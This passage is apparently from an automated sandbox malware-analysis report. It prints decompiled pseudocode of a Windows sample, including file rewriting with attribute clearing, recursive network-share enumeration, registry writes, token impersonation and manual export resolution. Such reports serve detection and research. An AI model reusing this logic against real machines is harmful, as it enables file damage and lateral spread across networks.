				char _v240;
				void* __ebx;
				void* __esi;
				void* _t26;
				void* _t28;
				long _t29;
				void* _t34;
				long _t35;
				void* _t37;
				void* _t38;
				signed char _t41;
				int _t42;
				signed int _t47;
				void* _t50;
				intOrPtr _t53;
				WCHAR* _t54;
				signed int _t57;
				signed int _t66;
				signed int _t68;
				void* _t71;
				void* _t72;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr _t78;

				_t65 = __edx;
				_t68 = 1;
				_t26 = E009B7895(_a8, 0x80000000, 1, 3, 0); // executed
				_t70 = _t26;
				_t73 = _t72 + 0x14;
				if(_t26 == 0) {
					L5:
					_t78 = _a16;
					_t53 = 0x100000;
					if(_t78 <= 0 && (_t78 < 0 || _a12 < 0x100000)) {
						_t53 = _a12;
					}
					_t69 = _a4;
					_t8 = _t53 + 0x160; // 0x100160
					_t28 = E009B7540(_a4, _t8); // executed
					while(1) {
						_t71 = _t28;
						if(_t71 != 0) {
							break;
						}
						_t29 = RtlGetLastWin32Error();
						__eflags = _t29 - 8;
						if(_t29 != 8) {
							L15:
							return 0;
						}
						E009B575C(_t29, 0x64);
						_t14 = _t53 + 0x160; // 0x100160
						_t28 = E009B7540(_t69, _t14);
						_t73 = _t73 + 0xc;
					}
					_t57 = 3;
					 *((intOrPtr*)(_t71 + 0x158)) = _t53;
					_t54 = _a8;
					_push(_t57);
					 *((intOrPtr*)(_t71 + 0x154)) = 0;
					 *((intOrPtr*)(_t71 + 0x150)) = 0;
					_v8 = _t57;
					_push(0);
					while(1) {
						_push(0xc0000000);
						_push(_a16);
						_push(_a12);
						_push(_t54);
						_push(_t71); // executed
						_t34 = E009B75BB(); // executed
						_t73 = _t73 + 0x1c;
						_t81 = _t34;
						if(_t34 != 0) {
							break;
						}
						_t35 = RtlGetLastWin32Error();
						_t66 = _v8;
						_t58 = _t66;
						_t65 = _t66 - 1;
						_v8 = _t66 - 1;
						__eflags = _t66;
						if(_t66 == 0) {
							L25:
							E009B7554(_t69, _t71); // executed
							_t37 = 0;
							L31:
							return _t37;
						}
						__eflags = _t35 - 5;
						if(_t35 != 5) {
							__eflags = _t35 - 0x20;
							if(__eflags == 0) {
								_t38 = E009B5A77(_t54, _t58, _t65, _t71, __eflags, _t54);
								 *_t73 = 0x3e8;
								E009B575C(_t38);
							}
							L28:
							_push(3);
							_push(0);
							continue;
						}
						E009B5659(_t58, _t54); // executed
						_t41 = GetFileAttributesW(_t54); // executed
						__eflags = _t41 - 0xffffffff;
						if(_t41 == 0xffffffff) {
							goto L25;
						}
						__eflags = _t41 & 0x00000001;
						if((_t41 & 0x00000001) == 0) {
							goto L28;
						}
						_t42 = SetFileAttributesW(_t54, 0x80); // executed
						__eflags = _t42;
						if(_t42 != 0) {
							goto L28;
						}
						goto L25;
					}
					E009B3077(_t65, _t81, _t71);
					_t37 = _t71;
					goto L31;
				}
				_t76 = _a16;
				if(_t76 > 0 || _t76 >= 0 && _a12 >= 0xe8) {
					E009B78D4(_t70, 0xffffff18, 0xffffffff, 2); // executed
					_t47 = E009B78BB(_t70,  &_v240, 0xe8,  &_v8); // executed
					_t73 = _t73 + 0x20;
					__eflags = _t47;
					if(_t47 == 0) {
						L12:
						_t68 = 0;
						L13:
						E009B4BEE(_t70); // executed
						__eflags = _t68;
						if(_t68 == 0) {
							goto L5;
						}
						_t50 = E009B69B3(0,  &_v64, 0x20);
						_t73 = _t73 + 0xc;
						__eflags = _v24 - _t50;
						if(_v24 != _t50) {
							goto L5;
						}
						goto L15;
					}
					__eflags = _v8 - 0xe8;
					if(_v8 == 0xe8) {
						goto L13;
					}
					goto L12;
				} else {
					E009B4BEE(_t70); // executed
					goto L5;
				}
			}






























            0x009b2ed8
            0x009b2eeb
            0x009b2ef5
            0x009b2efa
            0x009b2efc
            0x009b2f01
            0x009b2f1a
            0x009b2f1a
            0x009b2f1e
            0x009b2f23
            0x009b2f2c
            0x009b2f2c
            0x009b2f2f
            0x009b2f32
            0x009b2f3a
            0x009b2fc1
            0x009b2fc1
            0x009b2fc5
            0x00000000
            0x00000000
            0x009b2fa0
            0x009b2fa5
            0x009b2fa8
            0x009b2f99
            0x00000000
            0x009b2f99
            0x009b2fac
            0x009b2fb1
            0x009b2fb9
            0x009b2fbe
            0x009b2fbe
            0x009b2fc9
            0x009b2fcc
            0x009b2fd2
            0x009b2fd5
            0x009b2fd6
            0x009b2fdc
            0x009b2fe2
            0x009b2fe5
            0x009b304e
            0x009b304e
            0x009b3053
            0x009b3056
            0x009b3059
            0x009b305a
            0x009b305b
            0x009b3060
            0x009b3063
            0x009b3065
            0x00000000
            0x00000000
            0x009b2fe8
            0x009b2fed
            0x009b2ff0
            0x009b2ff2
            0x009b2ff3
            0x009b2ff6
            0x009b2ff8
            0x009b3026
            0x009b3028
            0x009b302e
            0x009b306f
            0x00000000
            0x009b306f
            0x009b2ffa
            0x009b2ffd
            0x009b3032
            0x009b3035
            0x009b3038
            0x009b303d
            0x009b3044
            0x009b3049
            0x009b304a
            0x009b304a
            0x009b304c
            0x00000000
            0x009b304c
            0x009b3000
            0x009b3007
            0x009b300d
            0x009b3010
            0x00000000
            0x00000000
            0x009b3012
            0x009b3014
            0x00000000
            0x00000000
            0x009b301c
            0x009b3022
            0x009b3024
            0x00000000
            0x00000000
            0x00000000
            0x009b3024
            0x009b3068
            0x009b306d
            0x00000000
            0x009b306d
            0x009b2f03
            0x009b2f06
            0x009b2f4d
            0x009b2f63
            0x009b2f68
            0x009b2f6b
            0x009b2f6d
            0x009b2f78
            0x009b2f78
            0x009b2f7a
            0x009b2f7b
            0x009b2f81
            0x009b2f83
            0x00000000
            0x00000000
            0x009b2f8c
            0x009b2f91
            0x009b2f94
            0x009b2f97
            0x00000000
            0x00000000
            0x00000000
            0x009b2f97
            0x009b2f6f
            0x009b2f76
            0x00000000
            0x00000000
            0x00000000
            0x009b2f13
            0x009b2f14
            0x00000000
            0x009b2f19

            APIs
              • Part of subcall function 009B7895: CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,009B415C,00000000,40000000,00000000,00000002,00000000,00000000,00000000), ref: 009B78AB
            • RtlGetLastWin32Error.NTDLL ref: 009B2FA0
            • RtlGetLastWin32Error.NTDLL ref: 009B2FE8
            • GetFileAttributesW.KERNELBASE(?), ref: 009B3007
            • SetFileAttributesW.KERNELBASE(?,00000080), ref: 009B301C
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: File$AttributesErrorLastWin32$Create
            • String ID:
            • API String ID: 1515811453-0
            • Opcode ID: 0361ac18948398ebdd3ab62ae07e24790ec456f92517919e7b00ef1eb9770e94
            • Instruction ID: d2efa87ab4c40eaa853511fed40c1eba1fa385757a30d736101cd0d6fd04c05f
            • Opcode Fuzzy Hash: 0361ac18948398ebdd3ab62ae07e24790ec456f92517919e7b00ef1eb9770e94
            • Instruction Fuzzy Hash: 4541E371908605AAEB21EF649F86FFF737CEF84331F144629F905A6182EA749E018761
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B7A73, Relevance: 6.1, APIs: 4, Instructions: 127shareCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 524 9b7a73-9b7a91 WNetOpenEnumW 525 9b7a9a-9b7ab2 call 9b494c 524->525 526 9b7a93-9b7a95 524->526 530 9b7ac4 525->530 531 9b7ab4-9b7abf WNetCloseEnum 525->531 527 9b7bd0-9b7bd4 526->527 533 9b7ac5-9b7adc WNetEnumResourceW 530->533 532 9b7bcf 531->532 532->527 534 9b7bae-9b7bb3 533->534 535 9b7ae2-9b7ae8 533->535 534->533 537 9b7bb9-9b7bba call 9b4999 534->537 535->533 536 9b7aea 535->536 538 9b7aed-9b7af1 536->538 542 9b7bbf-9b7bce WNetCloseEnum 537->542 540 9b7af3-9b7af5 538->540 541 9b7b27-9b7b2b 538->541 545 9b7b12-9b7b1c call 9b7a73 540->545 546 9b7af7-9b7afb 540->546 543 9b7b9b-9b7ba5 541->543 544 9b7b2d-9b7b3c call 9b494c 541->544 542->532 543->538 549 9b7bab 543->549 555 9b7b3e-9b7b92 call 9b5e33 call 9b61f8 call 9b6116 * 2 call 9b766a call 9b4999 544->555 556 9b7b95-9b7b98 544->556 551 9b7b21 545->551 546->541 550 9b7afd-9b7b00 546->550 549->534 550->541 553 9b7b02-9b7b10 call 9b6197 550->553 554 9b7b24 551->554 553->545 553->554 554->541 555->556 556->543
            C-Code - Quality: 98%
            			E009B7A73(int _a4, int _a8, struct _NETRESOURCE* _a12) {
				struct _NETRESOURCE* _v8;
				int _v12;
				void* _v16;
				int _v20;
				struct _NETRESOURCE* _v24;
				short _v26;
				char _v40;
				int _t36;
				void* _t38;
				struct _NETRESOURCE* _t41;
				signed int _t43;
				struct _NETRESOURCE* _t45;
				struct _NETRESOURCE* _t60;
				void* _t64;
				struct _NETRESOURCE* _t71;
				struct _NETRESOURCE* _t72;
				struct _NETRESOURCE** _t74;
				void* _t76;

				_t71 = _a12;
				_t36 = WNetOpenEnumW(_a8, 0, 0, _t71,  &_v16); // executed
				if(_t36 == 0) {
					_v12 = _v12 | 0xffffffff;
					_v20 = 0x4000;
					_t38 = E009B494C(0x4000); // executed
					_t64 = _t38;
					__eflags = _t64;
					if(_t64 != 0) {
						goto L5;
						do {
							while(1) {
								L5:
								_t41 = WNetEnumResourceW(_v16,  &_v12, _t64,  &_v20); // executed
								_v24 = _t41;
								__eflags = _t41;
								if(_t41 != 0) {
									goto L21;
								}
								_v8 = _t41;
								__eflags = _v12 - _t41;
								if(_v12 <= _t41) {
									continue;
								}
								_t14 = _t64 + 0x14; // 0x14
								_t74 = _t14;
								do {
									__eflags =  *(_t74 - 8) & 0x00000002;
									if(( *(_t74 - 8) & 0x00000002) == 0) {
										goto L15;
									}
									__eflags = _t71;
									if(_t71 == 0) {
										L13:
										_t20 = _t74 - 0x14; // 0x0
										E009B7A73(_a4, _a8, _t20); // executed
										_t76 = _t76 + 0xc;
										L14:
										_t41 = _v8;
										goto L15;
									}
									__eflags =  *(_t71 + 0x14);
									if( *(_t71 + 0x14) == 0) {
										goto L15;
									}
									__eflags =  *_t74;
									if( *_t74 == 0) {
										goto L15;
									}
									_t19 = _t71 + 0x14; // 0x4573
									_t60 = E009B6197( *_t19,  *_t74);
									__eflags = _t60;
									if(_t60 == 0) {
										goto L14;
									}
									goto L13;
									L15:
									__eflags =  *((intOrPtr*)(_t74 - 0x10)) - 1;
									if( *((intOrPtr*)(_t74 - 0x10)) == 1) {
										_t72 = E009B494C(0xfffe);
										__eflags = _t72;
										if(_t72 != 0) {
											E009B5E33(0x9c1338, 0x16a, 0x10, 0xe,  &_v40);
											_v26 = 0;
											E009B61F8(_t72,  &_v40);
											E009B6116(__eflags, _t72,  *_t74 + 2);
											E009B6116(__eflags, _t72, 0x9bd2b4);
											 *0x9c1d80 =  *0x9c1d80 & 0x00000000;
											__eflags =  *0x9c1d80;
											E009B766A(_t72, _a4);
											E009B4999(_t72);
											_t76 = _t76 + 0x38;
										}
										_t71 = _a12;
										_t41 = _v8;
									}
									_t41 = _t41 + 1;
									_t74 =  &(_t74[8]);
									_v8 = _t41;
									__eflags = _t41 - _v12;
								} while (_t41 < _v12);
								_t41 = _v24;
								goto L21;
							}
							L21:
							__eflags = _t41 - 0x103;
						} while (_t41 != 0x103);
						E009B4999(_t64); // executed
						_t43 = WNetCloseEnum(_v16);
						asm("sbb eax, eax");
						_t45 =  ~_t43 + 1;
						__eflags = _t45;
						L23:
						return _t45;
					}
					WNetCloseEnum(_v16);
					_t45 = 0;
					goto L23;
				}
				return 0;
			}





















            0x009b7a7d
            0x009b7a89
            0x009b7a91
            0x009b7a9a
            0x009b7aa5
            0x009b7aa8
            0x009b7aad
            0x009b7ab0
            0x009b7ab2
            0x009b7ac4
            0x009b7ac5
            0x009b7ac5
            0x009b7ac5
            0x009b7ad1
            0x009b7ad7
            0x009b7ada
            0x009b7adc
            0x00000000
            0x00000000
            0x009b7ae2
            0x009b7ae5
            0x009b7ae8
            0x00000000
            0x00000000
            0x009b7aea
            0x009b7aea
            0x009b7aed
            0x009b7aed
            0x009b7af1
            0x00000000
            0x00000000
            0x009b7af3
            0x009b7af5
            0x009b7b12
            0x009b7b12
            0x009b7b1c
            0x009b7b21
            0x009b7b24
            0x009b7b24
            0x00000000
            0x009b7b24
            0x009b7af7
            0x009b7afb
            0x00000000
            0x00000000
            0x009b7afd
            0x009b7b00
            0x00000000
            0x00000000
            0x009b7b04
            0x009b7b07
            0x009b7b0e
            0x009b7b10
            0x00000000
            0x00000000
            0x00000000
            0x009b7b27
            0x009b7b27
            0x009b7b2b
            0x009b7b37
            0x009b7b3a
            0x009b7b3c
            0x009b7b50
            0x009b7b57
            0x009b7b60
            0x009b7b6c
            0x009b7b77
            0x009b7b7f
            0x009b7b7f
            0x009b7b87
            0x009b7b8d
            0x009b7b92
            0x009b7b92
            0x009b7b95
            0x009b7b98
            0x009b7b98
            0x009b7b9b
            0x009b7b9c
            0x009b7b9f
            0x009b7ba2
            0x009b7ba2
            0x009b7bab
            0x00000000
            0x009b7bab
            0x009b7bae
            0x009b7bae
            0x009b7bae
            0x009b7bba
            0x009b7bc3
            0x009b7bcc
            0x009b7bce
            0x009b7bce
            0x009b7bcf
            0x00000000
            0x009b7bcf
            0x009b7ab7
            0x009b7abd
            0x00000000
            0x009b7abd
            0x00000000

            APIs
            • WNetOpenEnumW.MPR(?,00000000,00000000,009B34E8,?), ref: 009B7A89
            • WNetCloseEnum.MPR(?), ref: 009B7AB7
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: Enum$CloseOpen
            • String ID:
            • API String ID: 1701607978-0
            • Opcode ID: 39a233d05302e7c2570b6b299103510263263b2e9d10d7028aa9cb9319db9fae
            • Instruction ID: 911e4a3c8306a551e4c13c3bdd5262b30ee9d0628da32002f0a0cf422f999a2d
            • Opcode Fuzzy Hash: 39a233d05302e7c2570b6b299103510263263b2e9d10d7028aa9cb9319db9fae
            • Instruction Fuzzy Hash: 8C419F71908209BEEB21DFE4DE45FFEB7BCEF85720F200629F910A6191E7709A509B54
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B558B, Relevance: 6.1, APIs: 4, Instructions: 57registryCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 571 9b558b-9b55aa RegOpenKeyExW 572 9b55ac-9b55c4 RegQueryValueExW 571->572 573 9b5601-9b5608 571->573 574 9b55f7-9b5600 RegCloseKey 572->574 575 9b55c6-9b55c8 572->575 574->573 575->574 576 9b55ca-9b55d6 call 9b494c 575->576 576->574 579 9b55d8-9b55ec RegQueryValueExW 576->579 579->574 580 9b55ee-9b55f5 call 9b4999 579->580 580->574
            C-Code - Quality: 100%
            			E009B558B(void* _a4, short* _a8, short* _a12, int* _a16, int* _a20) {
				void* _v8;
				long _t13;
				long _t15;
				long _t18;
				int* _t27;
				char* _t30;

				_t30 = 0;
				_t13 = RegOpenKeyExW(_a4, _a8, 0, 1,  &_v8); // executed
				if(_t13 != 0) {
					L7:
					return _t30;
				}
				_t27 = _a20;
				_t15 = RegQueryValueExW(_v8, _a12, 0, _a16, 0, _t27); // executed
				if(_t15 == 0 &&  *_t27 != 0) {
					_t30 = E009B494C( *_t27);
					if(_t30 != 0) {
						_t18 = RegQueryValueExW(_v8, _a12, 0, _a16, _t30, _t27); // executed
						if(_t18 != 0) {
							E009B4999(_t30);
							_t30 = 0;
						}
					}
				}
				RegCloseKey(_v8); // executed
				goto L7;
			}









            0x009b559d
            0x009b55a2
            0x009b55aa
            0x009b5601
            0x009b5608
            0x009b5608
            0x009b55ad
            0x009b55bc
            0x009b55c4
            0x009b55d1
            0x009b55d6
            0x009b55e4
            0x009b55ec
            0x009b55ef
            0x009b55f5
            0x009b55f5
            0x009b55ec
            0x009b55d6
            0x009b55fa
            0x00000000

            APIs
            • RegOpenKeyExW.KERNELBASE(0000000C,00000007,00000000,00000001,?,009C0270,00000000,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55A2
            • RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,80000002,?,?,009B2342,80000002,?,?,?,?,009C0270), ref: 009B55BC
            • RegCloseKey.KERNELBASE(?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1,00000007,0000000C,?), ref: 009B55FA
              • Part of subcall function 009B494C: HeapCreate.KERNELBASE(00000000,00100000,00000000,?,009B1C68,?,?,009B150F), ref: 009B4961
              • Part of subcall function 009B494C: GetProcessHeap.KERNEL32(?,009B1C68,?,?,009B150F), ref: 009B4970
            • RegQueryValueExW.KERNELBASE(?,00000CA1,00000000,009C0270,00000000,?,?,?,009B2342,80000002,?,?,?,?,009C0270,00000CA1), ref: 009B55E4
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: HeapQueryValue$CloseCreateOpenProcess
            • String ID:
            • API String ID: 3348224683-0
            • Opcode ID: 934c331c5b6fef952eef21abba2614c0a75108fb18000287ba6fa04dd37739bc
            • Instruction ID: 7fbbb810b2677ae21f69bd84a9192761fc870bf12747eebbd3cd04261c207410
            • Opcode Fuzzy Hash: 934c331c5b6fef952eef21abba2614c0a75108fb18000287ba6fa04dd37739bc
            • Instruction Fuzzy Hash: C701923251420ABFEF214F91DD44EEFBB7EEF457A5B050069F90092120C7728E20ABA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5162, Relevance: 4.6, APIs: 3, Instructions: 55COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B5162(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				char _v36;
				long _t13;
				int _t17;
				void* _t24;
				void* _t28;

				_t24 = __ecx;
				E009B5E33(0x9c1338, 0x199, 0x10, 0x18,  &_v36);
				_v12 = 0;
				_t13 = E009B508A(_t24,  &_v36); // executed
				_t28 = OpenProcess(0x2000000, 0, _t13);
				if(_t28 != 0) {
					if(OpenProcessToken(_t28, 0xf01ff,  &_v8) != 0) {
						_t17 = ImpersonateLoggedOnUser(_v8); // executed
						E009B4BEE(_t28);
						E009B4BEE(_v8);
						return 0 | _t17 != 0x00000000;
					}
					E009B4BEE(_t28);
				}
				return 0;
			}










            0x009b5162
            0x009b517b
            0x009b5182
            0x009b518a
            0x009b51a0
            0x009b51a4
            0x009b51bc
            0x009b51cb
            0x009b51d4
            0x009b51dc
            0x00000000
            0x009b51ea
            0x009b51bf
            0x009b51c4
            0x00000000

            APIs
            • OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A
            • OpenProcessToken.ADVAPI32(00000000,000F01FF,009B7A11,?,?,?,?,?,00000001), ref: 009B51B4
            • ImpersonateLoggedOnUser.KERNELBASE(009B7A11,00000000,?,?,?,?,?,00000001,?,?,?,?,?,?,?,009B7A11), ref: 009B51CB
              • Part of subcall function 009B4BEE: FindCloseChangeNotification.KERNELBASE(00000000,?,009B74C6,00000000,?,009B7522,00000000,00000000,?,009B338D,?,00000000,00000000,009B3561), ref: 009B4BFA
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: OpenProcess$ChangeCloseFindImpersonateLoggedNotificationTokenUser
            • String ID:
            • API String ID: 2998948061-0
            • Opcode ID: 1bf5b3431cfaea156d4c49fc4ca98e57cc3ec51f8b0136c05632c970eca3a3e7
            • Instruction ID: b8a43588db3292012aaa2b8432e0c21f31782f5783a8b84a941540da8a242565
            • Opcode Fuzzy Hash: 1bf5b3431cfaea156d4c49fc4ca98e57cc3ec51f8b0136c05632c970eca3a3e7
            • Instruction Fuzzy Hash: 69014C36A882197BE71177B88E06FFE737CDF88730F100429FA05E2082EA60D91063A0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B5609, Relevance: 4.5, APIs: 3, Instructions: 36registryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B5609(void* __ecx, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _v8;
				long _t11;
				int _t19;

				_t19 = 0;
				_t11 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, 2, 0,  &_v8, 0); // executed
				if(_t11 == 0) {
					RegSetValueExW(_v8, _a12, 0, _a16, _a20, _a24); // executed
					_t19 =  ==  ? 1 : 0; // executed
					RegCloseKey(_v8); // executed
				}
				return _t19;
			}






            0x009b560e
            0x009b5621
            0x009b5629
            0x009b563b
            0x009b5649
            0x009b564c
            0x009b564c
            0x009b5658

            APIs
            • RegCreateKeyExW.KERNELBASE(00000000,009C21A0,00000000,00000000,00000000,00000002,00000000,009B18EE,00000000,00000000,?,?,009B2567,80000002,?,?), ref: 009B5621
            • RegSetValueExW.KERNELBASE(009B18EE,?,00000000,00000000,009C21F8,?,?,?,009B2567,80000002,?,?,00000003,009C2160,?,009C21F8), ref: 009B563B
            • RegCloseKey.KERNELBASE(009B18EE,?,?,009B2567,80000002,?,?,00000003,009C2160,?,009C21F8,00000000,?,009C21A0,00000000,009B18EE), ref: 009B564C
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: CloseCreateValue
            • String ID:
            • API String ID: 1818849710-0
            • Opcode ID: a943cc50098fc594604e7ec670a8172683c5c98e6dd76adc8b1cc173c944ffbd
            • Instruction ID: c8124dfc542b2d4dbaa705e7f022cb4beb52e1d98f2b73da232d3f4f144b3546
            • Opcode Fuzzy Hash: a943cc50098fc594604e7ec670a8172683c5c98e6dd76adc8b1cc173c944ffbd
            • Instruction Fuzzy Hash: 83F0DA36515129BBDF215F92DD09EDB7F6DEF0A2A1B404065FA0991021D6328A20EBE4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B7989, Relevance: 4.5, APIs: 3, Instructions: 23fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B7989(WCHAR* _a4, WCHAR* _a8) {
				int _t5;
				long _t7;
				void* _t8;
				void* _t10;
				int _t11;

				_t5 = MoveFileW(_a4, _a8); // executed
				_t11 = _t5;
				if(_t11 != 0) {
					L4:
					return _t11;
				}
				_t7 = RtlGetLastWin32Error();
				_t13 = _t7 - 3;
				if(_t7 != 3) {
					goto L4;
				}
				_t8 = E009B5162(_t10, _t13);
				if(_t8 != 0) {
					_t11 = MoveFileW(_a4, _a8);
					goto L4;
				}
				return _t8;
			}








            0x009b7993
            0x009b7999
            0x009b799d
            0x009b79c0
            0x00000000
            0x009b79c0
            0x009b799f
            0x009b79a4
            0x009b79a7
            0x00000000
            0x00000000
            0x009b79a9
            0x009b79b0
            0x009b79be
            0x00000000
            0x009b79be
            0x009b79c4

            APIs
            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009B7993
            • RtlGetLastWin32Error.NTDLL ref: 009B799F
              • Part of subcall function 009B5162: OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,00000001), ref: 009B519A
            • MoveFileW.KERNEL32(00000000,50C2440F), ref: 009B79B8
            Memory Dump Source
            • Source File: 00000000.00000002.573809240.00000000009B1000.00000020.00020000.sdmp, Offset: 009B0000, based on PE: true
            • Associated: 00000000.00000002.573798858.00000000009B0000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573820908.00000000009BD000.00000002.00020000.sdmp Download File
            • Associated: 00000000.00000002.573830437.00000000009C0000.00000004.00020000.sdmp Download File
            • Associated: 00000000.00000002.573838962.00000000009C3000.00000008.00020000.sdmp Download File
            • Associated: 00000000.00000002.573853514.00000000009D0000.00000002.00020000.sdmp Download File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_9b0000_Sample_5fba9b06c7da400016eb6275.jbxd
            Yara matches
            Similarity
            • API ID: FileMove$ErrorLastOpenProcessWin32
            • String ID:
            • API String ID: 1545481861-0
            • Opcode ID: 42acd5cb1ca0eefb8bb232e63413c70db87826cbd8e75dab92bd9ceb3d8258c3
            • Instruction ID: 400a31b496cc3ebd44028a82dbf181cb9e22c881b65ba25ca302042f72e302e9
            • Opcode Fuzzy Hash: 42acd5cb1ca0eefb8bb232e63413c70db87826cbd8e75dab92bd9ceb3d8258c3
            • Instruction Fuzzy Hash: 5BE08635905518A78F212BF8DD04AC97F5DDF493F0B014220FD18C6221C731CD6097D0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 009B6C81, Relevance: 3.1, APIs: 2, Instructions: 88libraryCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E009B6C81(CHAR* _a4, CHAR* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				struct HINSTANCE__* _t32;
				signed int _t36;
				void* _t37;
				int _t40;
				signed int _t41;
				char* _t47;
				void* _t48;
				void* _t53;
				intOrPtr _t57;
				intOrPtr _t62;
				intOrPtr* _t66;
				struct HINSTANCE__* _t69;

				E009B70D1(0x69335005);
				_t32 = LoadLibraryA(_a4); // executed
				_t69 = _t32;
				if(_t69->i == 0x5a4d) {
					_t66 =  *((intOrPtr*)(_t69 + 0x3c)) + _t69;
					__eflags =  *_t66 - 0x4550;
					if( *_t66 == 0x4550) {
						_t53 =  *((intOrPtr*)(_t66 + 0x78)) + _t69;
						_v20 =  *((intOrPtr*)(_t53 + 0x1c)) + _t69;
						_t57 =  *((intOrPtr*)(_t53 + 0x20)) + _t69;
						_t36 = 0;
						_v12 = _t57;
						_v8 = 0;
						__eflags =  *(_t53 + 0x18);
						if( *(_t53 + 0x18) <= 0) {
							L7:
							_t37 = 0;
							__eflags = 0;
							L8:
							L9:
							return _t37;
						} else {
							goto L5;
						}
						while(1) {
							L5:
							_v16 =  *((intOrPtr*)(_t53 + 0x24)) + _t69;
							_t40 = lstrcmpA(_a8,  *((intOrPtr*)(_t57 + _t36 * 4)) + _t69); // executed
							__eflags = _t40;
							_t41 = _v8;
							if(_t40 == 0) {
								break;
							}
							_t57 = _v12;
							_t36 = _t41 + 1;
							_v8 = _t36;
							__eflags = _t36 -  *(_t53 + 0x18);
							if(_t36 <  *(_t53 + 0x18)) {
								continue;
							}
							goto L7;
						}
						_t62 =  *((intOrPtr*)(_v20 + ( *(_v16 + _t41 * 2) & 0x0000ffff) * 4));
						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x78));
						if(_t62 <  *((intOrPtr*)(_t66 + 0x78))) {
							L14:
							_t37 = _t62 + _t69;
							goto L8;
						}
						__eflags = _t62 -  *((intOrPtr*)(_t66 + 0x7c)) +  *((intOrPtr*)(_t66 + 0x78));
